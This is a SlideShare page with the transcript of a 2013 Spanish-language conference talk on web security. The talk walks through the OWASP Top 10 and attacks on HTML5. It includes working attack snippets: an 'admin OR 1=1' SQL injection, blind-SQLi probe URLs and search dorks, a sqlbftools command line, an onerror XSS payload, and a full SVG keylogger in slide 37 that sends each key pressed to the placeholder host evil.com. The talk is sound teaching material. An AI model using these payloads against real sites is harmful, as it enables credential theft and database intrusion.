Your SlideShare is downloading. ×
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Saving this for later?

Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime - even offline.

Text the download link to your phone

Standard text messaging rates apply

La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades

479
views

Published on

Presentación Pablo Garaizar de la Universidad de Deusto, durante la XV Jornada de Seguridad TI de Nextel S.A. en la Alhóndiga de Bilbao el jueves 27 de junio de 2013.

Presentación Pablo Garaizar de la Universidad de Deusto, durante la XV Jornada de Seguridad TI de Nextel S.A. en la Alhóndiga de Bilbao el jueves 27 de junio de 2013.

Published in: Technology

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
479
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
13
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. PabloGaraizar, UniversidaddeDeustoXVJornadadeSeguridadTILaWebcomoplataformadereferencia: viejosataquesynuevasvulnerabilidades
  • 2. ¿De qué vamos a hablar?● Oldies goldies: OWASP Top 10, 2013:● A1 - Injections● A2 - Broken Authentication and Session Management● A3 - Cross-Site Scripting (XSS)● …● Nuevas vulnerabilidades en torno a HTML5.
  • 3. OWASP Top 10, 2013https://www.owasp.org/index.php/Top_10_2013-Top_10
  • 4. OWASPThe Open Web Application Security Projecthttps://www.owasp.org/index.php/Main_Page
  • 5. A1 - InjectionSQL, OS, and LDAP injectionshttps://www.owasp.org/index.php/Top_10_2013-A1
  • 6. SQL InjectionPor una comilla de nada...SELECT * FROM usersWHERE user = " + username + " andpassword = " + md5(password) + ";Username: admin OR 1=1Password: whateverSELECT * FROM usersWHERE user = admin OR 1=1 andpassword = " + md5(whatever) + ";
  • 7. SQL InjectionSi no hay mensajes de error, Blind SQL Injection● Si no hay error, se muestra la página normal.● http://myblog.com/post.asp?id=33 AND 1=1SELECT * FROM posts WHERE id = 33 AND 1=1● Si hay error, se muestra otra página.● http://myblog.com/post.asp?id=33 AND 1=0SELECT * FROM posts WHERE id = 33 AND 1=0● Google Hacking:– inurl:"php?id="– inurl:"asp?id="
  • 8. SQL InjectionBlind SQL Injection, herramientas● SQLbfTools:– http://www.reversing.org/node/view/11● ./mysqlbf.exe "http://web/vulnerable.php?ID=3" "now()""word"● SQL Ninja:– http://sqlninja.sourceforge.net/sqlninjademo1.html● Absinthe:– http://www.0x90.org/releases/absinthe/download.php
  • 9. A2 - Broken Authentication and Session ManagementCompromise passwords, keys, session tokens, etc.https://www.owasp.org/index.php/Top_10_2013-A2
  • 10. DEMOLogin en Flashinurl:login.swf
  • 11. A3 - Cross-Site Scripting (XSS)Allows attackers to execute scripts in the victim’s browserhttps://www.owasp.org/index.php/Top_10_2013-A3
  • 12. Cross-Site Scripting (XSS)Diferentes tipos y alcances● Tipo 0: Basado en DOM.– Una página maliciosa abre una página local con permisos de ZonaLocal y ejecuta código con esas credenciales.– Típicamente en phising o SPAM.● Tipo 1: No persistente.– El más común, necesita Ingeniería Social para explotarse.– Típicamente en webs de búsquedas, se muestra a su vez la cadenaconsultada (si tiene código, será ejecutado).● Tipo 2: Persistente.– El código está almacenado en una BD, fichero, o similar.– No requiere mucha Ingeniería Social para que la víctima lo ejecute.– Típicamente en foros o similares.
  • 13. A4 - Insecure Direct Object ReferencesReferences to an internal implementation object, such as a file, directory, or database keyhttps://www.owasp.org/index.php/Top_10_2013-A4
  • 14. RFIPHP shellshttp://oco.cc/
  • 15. A5 - Security MisconfigurationKeeping all software up to datehttps://www.owasp.org/index.php/Top_10_2013-A5
  • 16. The Exploit DatabaseBúsqueda de avisos + exploits ordenados por temas y fechashttp://www.exploit-db.com/
  • 17. A6 - Sensitive Data ExposureSensitive data deserves extra protection such as encryptionhttps://www.owasp.org/index.php/Top_10_2013-A6
  • 18. Seguridad a través de la oscuridadrobots.txthttp://www.casareal.es/robots.txtUser-agent: *Disallow:Disallow: /_*/Disallow: /ES/FamiliaReal/Urdangarin/Disallow: /CA/FamiliaReal/Urdangarin/Disallow: /EU/FamiliaReal/Urdangarin/Disallow: /GL/FamiliaReal/Urdangarin/Disallow: /VA/FamiliaReal/Urdangarin/Disallow: /EN/FamiliaReal/Urdangarin/Sitemap: http://www.casareal.es/sitemap.xml
  • 19. Seguridad a través de la oscuridadMeta-datos: Fear the FOCA!http://www.informatica64.com/foca.aspx
  • 20. A7 - Missing Function Level Access ControlAttackers are able to forge requests in order to access unauthorized functionalityhttps://www.owasp.org/index.php/Top_10_2013-A7
  • 21. Proteger el cron en MoodleSimilar para v1.9, 2.x, etc.http://docs.moodle.org/19/en/Cron
  • 22. A8 - Cross-Site Request Forgery (CSRF)Forces a logged-on victim’s browser to send a forged HTTP requesthttps://www.owasp.org/index.php/Top_10_2013-A8
  • 23. Cross-Site Request Forgery (CSRF)XSRF o "sea-surf"● Explota la confianza que tiene un sitio en elnavegador de un cliente autenticado.– El servidor: acepta las credenciales de la sesión deusuario almacenada en el navegador.– El cliente: accede a una web que fuerza a sunavegador a realizar acciones no deseadas en un sitioen el que previamente se ha autenticado.● Contramedida: tokens específicos en cadaformulario.
  • 24. A9 - Using Components with Known VulnerabilitiesVulnerable components, such as libraries, frameworks, and other software moduleshttps://www.owasp.org/index.php/Top_10_2013-A9
  • 25. The Exploit DatabaseBúsqueda de avisos + exploits ordenados por temas y fechashttp://www.exploit-db.com/
  • 26. A10 - Unvalidated Redirects and ForwardsAttackers can redirect victims to phishing or malware siteshttps://www.owasp.org/index.php/Top_10_2013-A10
  • 27. Ataques de redirecciónPoCs: IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowdhttp://soroush.secproject.com/blog/2013/03/iefirefox-redirection-issue-fb-oauth2-bypass-bugcrowd/
  • 28. Nuevas vulnerabilidades en torno a HTML5
  • 29. HTML5 Client-side Stored XSS in Web SQL Database<img onerror="alert(Client-side Stored XSS)" src="nil">http://www.andlabs.org/html5/csXSS2.html
  • 30. HTML5 Cross Origin Requestswget --header="Origin: http://www.andlabs.org" www.andlabs.net/html5/acCOR.phphttp://www.andlabs.org/html5/acCOR.php
  • 31. HTML5: muchos más ataquesWeb Sockets, Web Workers, UI dressing, HTML5 tag abuse, etc.http://html5security.org/
  • 32. http://www.slideshare.net/x00mario/stealing-the-pie
  • 33. Ataques sin scriptsfalso captcha usando tipografía propiahttp://heideri.ch/opera/captcha/
  • 34. Ataques sin scriptsFuerza bruta contra password usando CSS y Regexpshttp://html5sec.org/invalid?start=0
  • 35. Ataques sin scriptsLector de valores del DOM a través de CSS y Regexps (CSRF)http://eaea.sirdarckcat.net/cssar/v2/
  • 36. Ataques sin scriptsCapturador de sesión mediante CSS y Regexpshttp://
  • 37. Ataques sin scriptsKeylogger SVGhttp://html5sec.org/keylogger<!--injection--><svg height="0px"><image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none"><set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d" /><set attributeName="xlink:href" begin="accessKey(e)" to="//evil.com/?e" /><set attributeName="xlink:href" begin="accessKey(f)" to="//evil.com/?f" /><set attributeName="xlink:href" begin="accessKey(g)" to="//evil.com/?g" /><set attributeName="xlink:href" begin="accessKey(h)" to="//evil.com/?h" /><set attributeName="xlink:href" begin="accessKey(i)" to="//evil.com/?i" /><set attributeName="xlink:href" begin="accessKey(j)" to="//evil.com/?j" /><set attributeName="xlink:href" begin="accessKey(k)" to="//evil.com/?k" /><set attributeName="xlink:href" begin="accessKey(l)" to="//evil.com/?l" /><set attributeName="xlink:href" begin="accessKey(m)" to="//evil.com/?m" /><set attributeName="xlink:href" begin="accessKey(n)" to="//evil.com/?n" /><set attributeName="xlink:href" begin="accessKey(o)" to="//evil.com/?o" /><set attributeName="xlink:href" begin="accessKey(p)" to="//evil.com/?p" /><set attributeName="xlink:href" begin="accessKey(q)" to="//evil.com/?q" /><set attributeName="xlink:href" begin="accessKey(r)" to="//evil.com/?r" /><set attributeName="xlink:href" begin="accessKey(s)" to="//evil.com/?s" /><set attributeName="xlink:href" begin="accessKey(t)" to="//evil.com/?t" /><set attributeName="xlink:href" begin="accessKey(u)" to="//evil.com/?u" /><set attributeName="xlink:href" begin="accessKey(v)" to="//evil.com/?v" /><set attributeName="xlink:href" begin="accessKey(w)" to="//evil.com/?w" /><set attributeName="xlink:href" begin="accessKey(x)" to="//evil.com/?x" /><set attributeName="xlink:href" begin="accessKey(y)" to="//evil.com/?y" /><set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" /></image></svg>
  • 38. Ataques sin scriptsFuerza bruta contra contraseñas mediante tipografía con “ligaduras”http://fontforge.org/
  • 39. “All user input is evil until proven otherwise”Ken Cox
  • 40. Muchas gracias ;-)and... happy hacking!
  • 41. Referencias● OWASP: The Open Web Application Security Project.● El lado del mal, retos hacking, por Chema Alonso.● Fear the FOCA! Informática64.● IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd, porSoroush Dalili.● HTML5 Top 10 Threats Stealth Attacks and Silent Exploits, Shreeraj Shah.● HTML5 security.● Scriptless Attacks: Stealing the pie without touching the sill, por MarioHeiderich, Felix Schuster y Marcus Niemietz.● The Exploit Database.
  • 42. Todas las imágenes son propiedad desus respectivos dueños, el resto delcontenido está licenciado bajoCreative Commons by-sa 3.0http://www.zerodayclothing.com, OWASP.org, Microsoft, Exploit-db.com, Informatica64,http://www.flickr.com/photos/ivanlian/3331017290/sizes/l/in/photostream/http://www.flickr.com/photos/samout3/3411358304/sizes/l/in/photostream/http://www.flickr.com/photos/ndanger/9731511/sizes/l/in/photostream/http://www.flickr.com/photos/marcophoto/6264497575/sizes/l/in/photostream/etc.